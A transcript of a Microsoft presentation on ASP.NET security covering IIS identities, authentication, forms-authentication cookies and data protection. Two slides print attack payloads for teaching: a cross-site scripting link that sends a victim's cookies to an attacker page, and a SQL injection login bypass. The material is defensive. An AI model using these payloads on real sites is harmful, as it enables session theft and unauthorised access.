Presentation is loading. Please wait.

Presentation is loading. Please wait.

ASP.NET Security Part 1 Dave Glover

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "ASP.NET Security Part 1 Dave Glover"— Presentation transcript:

1 ASP.NET Security Part 1 Dave Glover dglover@microsoft.com
4/17/2017 4:38 AM ASP.NET Security Part 1 Dave Glover Developer & Platform Group Microsoft Australia. © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

2 Resources Patterns and Practices http://www.microsoft.com/security
Patterns and Practices Proven Practices Predictable Results Available from your Book Stores Free download from MSDN as PDFs

3 Today’s ASP.NET Agenda Part 1 Part 2 ASP.NET Security
ASP.NET Security cont Web Services Security ASP.NET Whidbey Logon Support

4 Agenda IIS Security and Process Model Validating Input
Securing Forms Authentication Data

5 Security and Process Model

6 IIS 5 & 6.0 Architecture Security and Process Models
4/17/2017 4:38 AM IIS 5 & 6.0 Architecture Security and Process Models IIS 6 and Windows 2003 IIS 5 and Windows 2000 W3WP.EXE Application Pool 1 W3WP.EXE ISAPI Extensions (ASP, etc.) ISAPI Filters Application Pool 2 Web Garden W3WP.EXE ISAPI Extensions (ASP, etc.) ISAPI Filters W3WP.EXE ASP.NET ISAPI CLR App Domain INETINFO W3WP.EXE ASP.NET ISAPI CLR App Domain metabase INETINFO HTTP.SYS WAS Config Mgr Process Mgr DLLHOST.exe ISAPI Extensions (ASP, etc.) ISAPI Filters W3WP.EXE ASP.NET ISAPI CLR App Domain Aspnet_wp.exe metabase ASP.NET ISAPI CLR App Domain ASP.NET ISAPI CLR App Domain CLR App Domain CLR App Domain TCP/IP © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

7 ASP.NET Process Identity
4/17/2017 4:38 AM ASP.NET Process Identity Windows® 2000: Default is ASPNET (local service account) Can also run as System or configured account using <processModel> New for the Fx 1.1 release: Support for DPAPI encrypted credentials in <processModel> Aspnet_setreg.exe for 1.0 Framework Windows® Server 2003 Uses IIS 6 process model Process identity is configurable Default identity is ‘Network Service’ © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8 Protection and Pooling
4/17/2017 4:38 AM IIS Security Where should the code execute? Protection and Pooling Authorization What is the caller allowed to do? Web Metabase Permissions Windows Access Controls Lists Authentication Anonymous Basic Digest X.509 Certificates Integrated Windows Passport (IIS 6) Who did the request come from? IP restrictions let administrators grant or deny access to callers using IP addresses or domain names SSL/TLS (Secure Sockets Layer/Transport Layer Security) may be used to encrypt communications between browsers and Web servers. Encrypting traffic between browsers and Web servers is vital if that traffic includes sensitive or potentially injurious data such as passwords, credit card numbers, or authentication cookies Authentication is a mechanism for identifying the caller. IIS supports several different types of authentication; each type has pros and cons, as indicated on the next slide Authorization is a set of rules defining who can access what resources on your Web site. Authorization goes hand-in-hand with authentication because if you don't know who the caller is, you can't apply access rules based on the caller's identity "Web metabase permissions" refers to the IIS access permissions that can be applied to virtual directories: Read, Run Scripts, Execute, Write, and Browse IIS 5's protection model lets administrators decide whether ISAPI DLLs run in Inetinfo.exe, in a pooled process separate and apart from Inetinfo.exe, or in dedicated processes all their own IIS 6 supports application pooling, which provides wider latitude in specifying which applications run in which processes and what the identities of those processes are Should traffic be encrypted? SSL/TLS Are calls from this IP address allowed? IP Restrictions © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

9 ASP.NET Security Authorization Impersonation Authentication
4/17/2017 4:38 AM ASP.NET Security Authorization What is the caller allowed to do? ACL Authorization URL Authorization Use process identity or caller identity? Impersonation Authentication Windows Passport Forms Who did the request come from? ASP.NET supports three types of authentication and two types of authorization. Authentication and authorization mechanisms are discussed in detail in the slides that follow Windows authentication Uses existing Windows user accounts Ideal for intranet applications Passport authentication Convenient for users (single sign-in) Puts credential storage in hands of others Forms authentication Typically uses eBay-style login pages Ideal for Internet applications © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

10 Authentication Anonymous Integrated Windows Authentication
IE Challenge/Response (NTLM/Kerberos) Digest – More secure than Basic Basic - Clear text must be over SSL/TLS Impersonation

11 Impersonation Impersonation Off (Default) Impersonation On
4/17/2017 4:38 AM Impersonation Impersonation Off (Default) Work done in the context of the ASP.NET Worker Process Required for connection pooling Impersonation On Work done based on the Callers Identity System level Auditing No connection pool Web.Config <identity impersonate="true" /> Under the hood, Windows uses thread tokens for access checks when threads have access tokens attached, and process tokens when threads lack tokens of their own. At the operating system level, impersonating a user involves little more than attaching that user's access token to the current thread © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

12 Authorization Strategies
4/17/2017 4:38 AM Authorization Strategies Windows Security and ACLs ACLs checked for Windows auth URL Authorization Enterprise Services/COM+ Roles Require impersonation Windows Server 2003 AuthZ Framework Task Based Authorisation Declarative and Programmatic Checks Authorisation & Profile Application Block Role Based Authorisation © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

13 Request Processing URL & File Authorization HTTP Modules Http Context
ASP.NET Page ASP.NET Service HTTP Handler Application HTTP Module Http Context URL & File Authorization HTTP Modules HTTP Module Global.asax .NET Code ASP.NET Runtime Host (IIS, IE) Native Code

14 Intranet Applications
4/17/2017 4:38 AM Intranet Applications SQL permissions Database roles ACL authorization ASP.NET Process or Impersonated Identity Web Server Database Server Bob IIS ASP. NET SQL Server Trusted Connection A A Alice A A Bill A A IPSec For intranet applications, where users already have Windows accounts, use Windows authentication and ACL authorization Whether you use SQL Server logins or Windows authentication to authenticate to the database is a choice you make; either works fine in this scenario. Whichever you choose, you may also want to use IPSec or SSL/TLS to encrypt communications between the Web server and database server If you use IPSec to protect communications between the Web server and database server, you can also restrict access to the database server so that ONLY the Web server can call it Encrypting communications between the Web server and database server might seem like overkill, but remember that many attacks come from BEHIND the firewall (that is, from employees of your company) Integrated Windows authentication Windows authentication Windows authentication © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

15 Internet Applications
4/17/2017 4:38 AM Internet Applications SQL permissions Database roles URL authorization ASP.NET Process Identity Web Server Database Server Firewall Bob IIS ASP. NET SQL Server Trusted Connection Alice Bill IPSec For Internet applications (think eBay and Amazon.com), where users do NOT have Windows accounts, use forms authentication and URL authorization Tokens passed from IIS to ASP.NET (not shown) represent the anonymous user (by default, IUSR_machinename) but are not used since we're using URL authorizations Anonymous access (no authentication) Forms authentication Windows authentication © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

16 Demo 1 Authentication & Authorization Windows Integrated Forms Based
Unrestricted File Types

17 Validating Input

18 4/17/2017 4:38 AM All Input is Evil!! All uncontrolled inputs must either be checked or encoded Eg TextBox.Text URI parameters and cookies Encoding is best if just echoing web content Use HttpUtility.HtmlEncode(UserInput.Text) Avoid using file names as input if possible © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

19 Encoding Good Validation Better!!
Always use the ‘known good’ case Validation Controls Always server, but client when possible Must check that page.isvalid Framework Regular Expression Support System.Text.RegularExpressions ASP.NET 1.1 request validation Automatically rejects requests containing certain characters and character sequences (e.g., "<script")

20 Cross-Site Scripting Attacks
4/17/2017 4:38 AM Cross-Site Scripting Attacks URL of the site targeted by the attack <a href=" Search=<script language='javascript'> document.location.replace (' Cookie=‘ + document.cookie); </script>">…</a> The query string used in this example (which is taken from the demo that follows) includes JavaScript code that gathers up the cookies (document.cookies) issued to the victim by the targeted site (Search.aspx) and transmits them to the attacker's site (EvilPage.aspx) in a query string. Redirection is accomplished by calling document.location.replace. All EvilPage.aspx has to do to retrieve the cookies is parse them from the query string This attack is alarmingly effective if Search.aspx "trust" input and echoes the query string to the page, and is a fine example of how cross-site scripting can be used to steal cookies Query string contains embedded JavaScript that redirects to attacker’s page and transmits cookies issued by Search.aspx in a query string © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

21 SQL Injection Attacks SELECT COUNT (*) FROM Users
4/17/2017 4:38 AM SQL Injection Attacks Model Query SELECT COUNT (*) FROM Users WHERE UserName=‘Jeff’ AND Password=‘imbatman’ Malicious Query – Always true, Count always 1 SELECT COUNT (*) FROM Users WHERE UserName=‘’ or 1=1-- AND Password=‘’ This type of query is often used in forms authentication code to validate user names and passwords The model query is what the developer envisioned executing when he or she wrote the code. It returns the number of records in the Users table where the user name is "Jeff" and the password is "imbatman." A return value of 0 means there are no matching records, and therefore that the credentials the user entered are invalid The malicious query demonstrates how an attacker can use malicious input to change the very nature of the command executed against the database. It returns the number of records in the Users table. If the application interprets a non-zero return value to mean that the credentials are valid, the attacker gains illicit entry to the site Protect using Stored Procs and Parameterised Queries © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

22 Badlogon SQL Injection BadSearch Cross Site Scripting
Demo 2 Badlogon SQL Injection BadSearch Cross Site Scripting

23 Securing Forms Authentication Data
If possible Integrated Authentication

24 Forms Authentication Available to anonymous users? Resource Yes No Yes
4/17/2017 4:38 AM Forms Authentication Available to anonymous users? Resource Yes No Yes Valid authentication cookie? Requestor authorized? Yes No No Access denied Issue auth cookie Forms authentication is nothing new; it has been around for a long time and is used on popular sites such as eBay and Amazon.com. Numerous ASP sites use it, too. What's significant here is that ASP.NET formalizes forms authentication and does most of the work for you (meaning you write less code to make it happen) You provide the login page and the logic for validating logins; ASP.NET provides everything else Yes Login Page Login successful? No © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

25 <forms loginUrl="https://.../LoginPage.aspx" />
4/17/2017 4:38 AM Forms Authentication Protect login credentials with SSL/TLS 1 <forms loginUrl=" /> Don't store passwords; store password hashes Limit authentication cookie lifetimes to minimize windows for replay attacks Assume authentication cookies are spoofed or stolen when performing sensitive operations Sometimes you can't store password hashes and must store encrypted passwords instead. For example, if you want the ability to lost passwords to users, you must store them in recoverable form eBay recently reduced the lifetimes of its persistent authentication cookies from several weeks to a few hours, presumably to reduce their site's attack surface "Assume authentication cookies are spoofed" means asking users to log in again before performing potentially dangerous operations such as executing a credit card purchase, even if the request contains a valid authentication cookie. Example: eBay uses authentication cookies to identify you, but even after logging in, eBay asks for your user name and password again before performing certain operations (such as retrieving a seller's address) RE: "Don't rely on forms authentication to protect resources not owned by ASP.NET." Forms authentication doesn't protect HTM(L) files, JP(E)G files, and other files that aren't mapped to Aspnet_isapi.dll in the IIS metabase. One solution is to map them to Aspnet_isapi.dll in the IIS metabase and to StaticFileHandler in Machine.config or Web.config. Note that doing so impedes performance (particularly when ASP.NET is paired with IIS 5) Don't rely on forms authentication to protect resources not owned by ASP.NET © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

26 Authentication Cookies
4/17/2017 4:38 AM Authentication Cookies Forms authentication cookies are encrypted and validated by default Prevents reading and alteration Doesn’t prevent theft and replay Preventative measures are required to defend against unauthorized access Defense Comments Restrict cookies to SSL Prevents cookie theft (strongest defense) Limit cookie lifetime Mitigates replay attacks by limiting attack window Disable sliding renewal You can disable cookie encryption, but don't! Even SSL won't protect you from cookie tampering by a legitimate client © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

27 Authentication Cookie Lifetime
4/17/2017 4:38 AM Authentication Cookie Lifetime Temporary authentication cookies Lifetime limited (by default) to 30 minutes Controlled by <forms> timeout attribute Subject to sliding renewal in ASP.NET 1.0 Sliding renewal disabled by default in 1.1 Controlled by <forms> slidingExpiration attribute Persistent authentication cookies Default lifetime = 50 years! Longer lifetime = Greater vulnerability to replay attacks ASP.NET 1.0 lacks an option for disabling sliding renewal of forms authentication cookies The fact that persistent authentication cookies default to a lifetime of 50 years is a BIG DEAL. NEVER issue an authentication cookie that's good for 50 years unless you don't care about security © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

28 Data Protection Support
4/17/2017 4:38 AM Data Protection Support System.Security.Cryptography classes Encrypting connection strings is easy Key Management is not easy Data Protection API (DPAPI) Present in Windows 2000 and higher Strong encryption, automatic key generation, and secure key storage - 3DES and PKCS #5 encryption .NET FCL 1.x doesn't wrap DPAPI Configuration Application Block (MSDN) The BIG WIN with DPAPI is that it offloads the task of key management to the operating system ASP.NET doesn't map very well to the user store because all ASP.NET apps run under one user profile. ASP.NET maps very well to the machine store, which doesn't rely on user profiles The downside to the machine store is that data encrypted by one app can be decrypyted by another. Use per-application entropy values if you wish to privatize keys stored in the machine store. Remember that entropy values are keys that must be stored securely just like other secrets! ACLed registry keys are one place to store entropy values © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

29 SQL Connections Strings
4/17/2017 4:38 AM SQL Connections Strings Description Security Store encrypted connection strings in Web.config Store key in ACLed registry entry Good Let DPAPI perform key management Better Store encrypted connection strings in ACLed registry key Use entropy values to harden DPAPI encryption Store entropy values in ACLed registry key Best The Microsoft Reference Application for OpenHack (MRAO) presented in session 4 uses the "Best" approach Also see the Configuration Application Block on MSDN © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

30 SQL & Windows Authentication
4/17/2017 4:38 AM SQL & Windows Authentication Identity Pros Cons Worker process Connection pooling No one-hop issues ASPNET account lacks network credentials All callers share one set of database permissions Impersonated identity Company policies sometimes require user-level auditing of database accesses Increased granularity of database permissions Foils connection pooling Raises one-hop issues 10 Added administration Grants database access to more principals COM+ identity Decreased performance Increased complexity RE: One-hop issues: In the absence of delegation, Windows security tokens can only make one hop from machine to machine over the network. The classic case is where the Web server authenticates the caller using Integrated Windows Authentication and then tries to impersonate the caller and authenticate against a remote database server. That won't work without delegation Delegation isn't supported by most authentication protocols. However, in Windows 2003 server, Kerberos protocol transition and constrained delegation make all authentication protocols delegatable and can be used to work around 1-hop issues. See See for details Bringing COM+ into the picture probably isn't justifiable unless you're using other features of COM+ (such as declarative transactions) © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

31 Accessing Data Securely
4/17/2017 4:38 AM Accessing Data Securely Code against SQL Injection Attacks Use Secured Stored Procedures or Parameterized Commands Don’t use Dynamic SQL commands Never use sa to access Web databases – Use Least Privileges Store connection strings securely (Integrated Security Better) DPAPI or Configuration Application Block Administrative protections for SQL Server include: - Staying up-to-date with SQL Server service packs and updates - Blocking SQL Server ports at the firewall (TCP 1433 and UDP 1434) - Assigning a strong password to the sa account - Running SQL Server using a domain account with limited privileges - Logging failed connection attempts Apply administrative protections to SQL Server 8 Optionally use SSL/TLS or IPSec to secure the connection to the database server 2,9 i © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

32 Hashed Password Authentication
Database Server Web Server GetUserSalt SP Firewall Bob IIS ASP. NET Trusted Connection Alice Salt Table IPSec Bill Hash Table CmpUserHash SP Forms authentication

33 Demo 3 Accessing Data Securely Goodlogon.aspx and Validators (IsValid)
GoodQuotes.aspx and Query Validation GoodSearch.aspx – HTML-Encoding

34 4/17/2017 4:38 AM Call to Action Secure software requires knowledgeable and dedicated IT personnel Software isn't secure if the network is not Administration is the bedrock of security Secure software also requires knowledgeable and dedicated developers Proper administration is meaningless if the code you write isn't secure Most developers today don't know they're writing insecure code There are two components to a secure Web application: an administrative component and a programmatic component Administrative component includes keeping IIS up-to-date with service packs and security updates, hardening routers, making sure firewalls are properly configured, etc. The programmatic component involves writing secure code, which is what today's Web Security track is all about SECURE SOFTWARE IS THE PRODUCT OF THOUGHTFUL AND DELIBERATE DESIGN! © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

35 Resources Patterns and Practices http://www.microsoft.com/security
Patterns and Practices Proven Practices Predictable Results Available from your Book Stores Free download from MSDN as PDFs

36 © 2003-2004 Microsoft Corporation. All rights reserved.
4/17/2017 4:38 AM © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary. © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Download ppt "ASP.NET Security Part 1 Dave Glover"

Similar presentations

Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!

Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
ASP.NET Web Application Security Hannes Preishuber ppedv AG

ASP.NET Web Application Security Hannes Preishuber ppedv AG
Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
ASP.NET Web Application Security Hannes Preishuber ppedv AG

ASP.NET Web Application Security Hannes Preishuber ppedv AG
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 7 HARDENING SERVERS.

Chapter 7 HARDENING SERVERS.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Microsoft ASP.NET Security Venkat Chilakala Support Professional Microsoft Corporation.

Microsoft ASP.NET Security Venkat Chilakala Support Professional Microsoft Corporation.
Using Internet Information Server And Microsoft ® Internet Explorer To Implement Security On The Intranet HTTP.

Using Internet Information Server And Microsoft ® Internet Explorer To Implement Security On The Intranet HTTP.
Introduction To Windows NT ® Server And Internet Information Server.

Introduction To Windows NT ® Server And Internet Information Server.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Security in SQL Jon Holmes CIS 407 Fall 2007. Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.

Security in SQL Jon Holmes CIS 407 Fall Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.
Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.

Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Varun Sharma Security Engineer | ACE Team | Microsoft Information Security

Varun Sharma Security Engineer | ACE Team | Microsoft Information Security
Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department

Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department
April-June 2006 Windows Hosting Seminar Series Product Roadmap: IIS 7.0 Matthew Boettcher Web Platform Technical Evangelist (Hosting) Developer & Platform.

April-June 2006 Windows Hosting Seminar Series Product Roadmap: IIS 7.0 Matthew Boettcher Web Platform Technical Evangelist (Hosting) Developer & Platform.
Internet Information Server 6.0. Overview  What’s New in IIS 6.0?  Built-in Accounts and IIS 6.0  IIS Pass-Through Authentication  Securing Web Traffic.

Internet Information Server 6.0. Overview  What’s New in IIS 6.0?  Built-in Accounts and IIS 6.0  IIS Pass-Through Authentication  Securing Web Traffic.

Similar presentations

Ads by Google